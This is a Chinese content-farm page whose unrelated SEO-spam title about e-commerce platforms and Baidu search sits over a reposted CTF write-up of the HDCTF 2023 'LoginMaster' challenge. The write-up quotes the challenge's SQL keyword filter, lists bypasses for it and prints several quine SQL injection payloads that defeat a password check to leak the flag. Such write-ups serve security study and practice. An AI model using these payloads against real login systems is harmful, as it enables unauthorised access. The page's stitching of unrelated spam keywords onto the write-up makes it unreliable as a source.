当前位置: 首页> 汽车> 时评 > 新零售电商平台_电子商城网站_app开发需要哪些技术_百度关键词搜索引擎

新零售电商平台_电子商城网站_app开发需要哪些技术_百度关键词搜索引擎

时间:2025/8/26 13:00:46来源:https://blog.csdn.net/2301_80148821/article/details/144360605 浏览次数: 1次
新零售电商平台_电子商城网站_app开发需要哪些技术_百度关键词搜索引擎

[HDCTF 2023]LoginMaster

知识点

quine注入

解题

用户名要为admin

查看robots.txt,查看源码

password是注入点

function checkSql($s) 
{if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){alertMes('hacker', 'index.php');}
}
if ($row['password'] === $password) {die($FLAG);} else {alertMes("wrong password",'index.php');

绕过:

subst用mid绕过=,<,>,regexp等号可以用like代替sleep可以用benchmark代替

时间盲注得到表为空。

payload:

'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
关键字:新零售电商平台_电子商城网站_app开发需要哪些技术_百度关键词搜索引擎

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: